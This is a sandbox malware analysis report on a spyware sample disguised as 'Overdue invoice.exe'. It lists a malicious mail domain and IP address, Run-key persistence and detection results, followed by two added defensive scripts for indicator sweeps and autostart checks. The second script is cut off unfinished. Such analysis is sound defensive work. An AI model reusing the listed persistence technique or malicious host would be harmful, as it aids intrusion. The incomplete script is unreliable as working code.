                    C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
                    SourceDetectionScannerLabelLinkDownload
                    19.0.yqWDN.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    19.2.yqWDN.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    7.2.Overdue invoice.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    SourceDetectionScannerLabelLink
                    mail.jkudyog.com1%VirustotalBrowse
                    SourceDetectionScannerLabelLink
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn//: | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.comepko | 0% | URL Reputation | safe
http://www.fontbureau.comessed | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://mail.jkudyog.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnoO | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
http://www.fonts.comn | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.urwpp.depA | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/l | 0% | Avira URL Cloud | safe
http://www.fontbureau.comttoF | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.fontbureau.com= | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr= | 0% | Avira URL Cloud | safe
http://www.fontbureau.comlicF | 0% | URL Reputation | safe
https://I323GyXsTwT8KsWsK7L.net8 | 0% | Avira URL Cloud | safe
http://www.agfamonotype. | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
http://www.founder.com.cn/cnt-ia | 0% | Avira URL Cloud | safe
http://www.fontbureau.comoGC | 0% | Avira URL Cloud | safe
http://www.fontbureau.comdc | 0% | Avira URL Cloud | safe
http://dWZLeu.com | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr$A | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnz | 0% | URL Reputation | safe
http://www.fontbureau.comd | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.sandoll.co.krF1 | 0% | Avira URL Cloud | safe
http://www.fontbureau.comB.TTFlC | 0% | Avira URL Cloud | safe
https://I323GyXsTwT8KsWsK7L.net | 0% | Avira URL Cloud | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.founder.com.cn/cne-d | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.fontbureau.comals | 0% | URL Reputation | safe
http://www.tiro.comh | 0% | URL Reputation | safe
http://www.tiro.comc | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.jkudyog.com | 206.183.111.188 | true | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.com/designers/? | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.founder.com.cn/cn/bThe | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.com/3C | Overdue invoice.exe, 00000000.00000003.259988892.0000000005908000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.founder.com.cn/cn//: | Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253859484.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253816400.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253456642.000000000591B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.comepko | Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comessed | Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.jkudyog.com | Overdue invoice.exe, 00000007.00000002.522968890.0000000003760000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnoO | Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254953312.000000000590B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | Overdue invoice.exe, 00000000.00000003.252984688.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252856713.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252888263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253011774.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252782511.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253067018.0000000005924000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252808922.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253115594.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252958098.000000000591E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632 | Overdue invoice.exe, 00000007.00000003.315746874.00000000011D4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.comn | Overdue invoice.exe, 00000000.00000003.253007661.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253040437.000000000591B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.depA | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/l | Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comttoF | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.sandoll.co.kr | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.sakkal.com | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com= | Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.sandoll.co.kr= | Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.comlicF | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.com | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://I323GyXsTwT8KsWsK7L.net8 | Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.agfamonotype. | Overdue invoice.exe, 00000000.00000003.265415364.000000000590A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnt-ia | Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comoGC | Overdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comdc | Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://dWZLeu.com | yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kr$A | Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.founder.com.cn/cnz | Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comd | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.founder.com.cn/cn | Overdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.sandoll.co.krF1 | Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlP | Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.com/designers/cabarga.html | Overdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260841728.0000000005935000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.comB.TTFlC | Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://I323GyXsTwT8KsWsK7L.net | yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comm | Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cne-d | Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.como | Overdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.fontbureau.comdC | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://www.fontbureau.comals | Overdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comh | Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comc | Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
206.183.111.188 | mail.jkudyog.com | United States | 133296 | WEBWERKS-AS-IN WebWerks India Pvt Ltd, IN | true
                                                  IP
                                                  192.168.2.1
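The domain and IP tables above give the two network indicators this sample produced (mail.jkudyog.com, resolving to 206.183.111.188, which the report marks malicious and ties to a long list of related samples). The script below is an added example, not part of the Joe Sandbox report, of turning those two indicators into a log sweep. It matches a domain only on whole labels (exact or subdomain, after lowercasing and stripping a trailing dot), because a substring test would also fire on unrelated names that merely contain the string, and it compares IPs as parsed addresses rather than text. The connection and DNS log lines are constructed in a Zeek-like tab-separated layout; the destination port 587 in the first line is an assumption (the report section above does not state the port the sample used).

```python
"""Sweep constructed connection/DNS logs for the report's network IoCs.
Added example (not Joe Sandbox code). IoC values come from the report's
domain and IP tables; every log line below is constructed for the demo."""
import ipaddress

IOC_DOMAINS = {"mail.jkudyog.com"}                     # from the report
IOC_IPS = {ipaddress.ip_address("206.183.111.188")}   # from the report


def norm_domain(name):
    """Lowercase and drop a trailing dot so 'MAIL.JKUDYOG.COM.' still matches."""
    return name.strip().lower().rstrip(".")


def domain_matches(name, iocs):
    """True if name equals an IoC or is a subdomain of one, compared label by
    label. A plain substring test would also hit 'notmail.jkudyog.com.evil.test'."""
    labels = norm_domain(name).split(".")
    for ioc in iocs:
        ioc_labels = norm_domain(ioc).split(".")
        if len(labels) >= len(ioc_labels) and labels[-len(ioc_labels):] == ioc_labels:
            return True
    return False


def ip_matches(text, iocs):
    """Compare as parsed addresses; '206.183.111.18' must not match by prefix."""
    try:
        return ipaddress.ip_address(text.strip()) in iocs
    except ValueError:
        return False


# Constructed conn log: ts, uid, src, sport, dst, dport, proto (port 587 is an assumption)
CONN_LOG = """\
1653648811.123\tCx1\t192.168.2.5\t49712\t206.183.111.188\t587\ttcp
1653648812.456\tCx2\t192.168.2.5\t49713\t206.183.111.18\t443\ttcp
1653648813.789\tCx3\t192.168.2.7\t49714\t20.54.89.106\t443\ttcp
"""
# Constructed dns log: ts, src, query, qtype, answer
DNS_LOG = """\
1653648810.001\t192.168.2.5\tmail.jkudyog.com\tA\t206.183.111.188
1653648810.002\t192.168.2.5\tnotmail.jkudyog.com.evil.test\tA\t10.0.0.1
1653648810.003\t192.168.2.7\tfs.microsoft.com\tA\t20.54.89.106
1653648810.004\t192.168.2.9\tMAIL.JKUDYOG.COM.\tA\t206.183.111.188
1653648810.005\t192.168.2.9\tsub.mail.jkudyog.com\tA\t10.0.0.2
"""


def _rows(log):
    for line in log.splitlines():
        if line.strip() and not line.startswith("#"):
            yield line.split("\t")


def scan_conn(log):
    """Hits where the destination address is an IoC IP."""
    hits = []
    for ts, uid, src, sport, dst, dport, proto in _rows(log):
        if ip_matches(dst, IOC_IPS):
            hits.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport), "why": "dst IP"})
    return hits


def scan_dns(log):
    """Hits where the query is an IoC domain (or subdomain) or the answer is an IoC IP."""
    hits = []
    for ts, src, query, qtype, answer in _rows(log):
        if domain_matches(query, IOC_DOMAINS):
            hits.append({"ts": ts, "src": src, "query": norm_domain(query), "why": "query"})
        elif ip_matches(answer, IOC_IPS):
            hits.append({"ts": ts, "src": src, "query": norm_domain(query), "why": "answer IP"})
    return hits


def affected_hosts(conn_log, dns_log):
    """Internal hosts to triage: every source that talked to or resolved an IoC."""
    srcs = {h["src"] for h in scan_conn(conn_log)} | {h["src"] for h in scan_dns(dns_log)}
    return sorted(srcs)


if __name__ == "__main__":
    for hit in scan_dns(DNS_LOG) + scan_conn(CONN_LOG):
        print(hit)
    print("hosts to triage:", affected_hosts(CONN_LOG, DNS_LOG))
```

Running it lists the three DNS hits (the exact name, the upper-case name with a trailing dot, and the subdomain), the one connection to 206.183.111.188, and the two internal hosts to triage; the look-alike name and the near-miss address 206.183.111.18 are correctly ignored.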
                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:635084
Start date and time: 2022-05-27 12:52:12 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:Overdue invoice.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 80%
                                                  HDC Information:
                                                  • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                  • Quality average: 36.5%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 210
                                                  • Number of non-executed functions: 30
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target Overdue invoice.exe, PID 7124 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:53:25 | API Interceptor | 703x Sleep call for process: Overdue invoice.exe modified
12:53:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
12:53:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
12:53:58 | API Interceptor | 456x Sleep call for process: yqWDN.exe modified
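The two Autostart events above are the persistence this sample leaves behind: a Run value named yqWDN, written under both the HKCU and HKCU64 paths, pointing at a copy of itself in C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe. The script below is an added example of the host-side check that follows from that timeline; it is not Joe Sandbox code. It parses each Run value into an image path (quoted or unquoted, with %VAR% expansion) and flags images that live in user-writable locations, which is where an unprivileged dropper can write. On Windows it walks Run and RunOnce under HKCU and HKLM in both the 64-bit and 32-bit registry views; elsewhere it runs against a constructed entry list in which only the yqWDN line is taken from the report (the OneDrive, SecurityHealth and Updater entries and the environment mapping are invented for the demo).

```python
r"""Flag Run/RunOnce autostart entries whose image lives in a user-writable
directory, as with the report's yqWDN -> C:\Users\user\AppData\Roaming\... entry.
Added example, not Joe Sandbox code. Only the yqWDN entry below comes from the
report; the other sample entries and SAMPLE_ENV are constructed."""
import os
import re
import sys
from dataclasses import dataclass

# Locations a standard user can write to. An autostart image here is a
# persistence candidate; legitimate per-user installers land here too, so the
# next stage is a signature/hash allow-list, not an automatic verdict.
USER_WRITABLE = [
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\(roaming|local|locallow)\\", re.I),
    re.compile(r"^[a-z]:\\users\\public\\", re.I),
    re.compile(r"^[a-z]:\\programdata\\", re.I),
    re.compile(r"^[a-z]:\\windows\\temp\\", re.I),
    re.compile(r"\\temp\\", re.I),
]
RUN_KEYS = [
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
]


@dataclass
class Entry:
    hive: str      # e.g. HKCU, HKCU64, HKLM32 (hive plus registry view)
    key: str
    name: str
    command: str


@dataclass
class Finding:
    entry: Entry
    image: str
    suspicious: bool
    reason: str


def expand_env(path, env):
    """Expand %VAR% with a caller-supplied mapping (os.path.expandvars only
    understands %VAR% on Windows; this keeps the logic testable anywhere)."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def image_path(command):
    """Executable from a Run value: the quoted first token, or the shortest
    prefix ending in an executable extension (unquoted paths with spaces are common)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.+?\.(?:exe|com|scr|bat|cmd|vbs|js|ps1|dll))(?:\s|$)", command, re.I)
    return m.group(1) if m else command.split()[0]


def classify(entries, env):
    """Resolve each entry's image and flag it if it sits under a user-writable root."""
    findings = []
    for e in entries:
        image = expand_env(image_path(e.command), env).replace("/", "\\")
        hit = next((p.pattern for p in USER_WRITABLE if p.search(image)), None)
        if hit:
            findings.append(Finding(e, image, True, f"image under user-writable path ({hit})"))
        else:
            findings.append(Finding(e, image, False, "image outside user-writable paths"))
    return findings


def suspicious_names(findings):
    return [f.entry.name for f in findings if f.suspicious]


def read_run_keys():
    """Windows only: enumerate Run/RunOnce under HKCU and HKLM in both the 64-bit
    and 32-bit views, since the report records the write under HKCU and HKCU64."""
    import winreg
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    views = {"64": winreg.KEY_WOW64_64KEY, "32": winreg.KEY_WOW64_32KEY}
    out = []
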